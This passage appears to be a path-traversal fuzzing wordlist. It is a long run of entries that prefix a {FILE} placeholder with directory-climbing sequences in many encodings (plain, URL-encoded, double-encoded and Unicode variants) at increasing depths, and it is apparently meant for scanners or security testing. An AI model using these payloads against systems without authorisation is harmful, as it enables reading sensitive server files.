"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
"true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
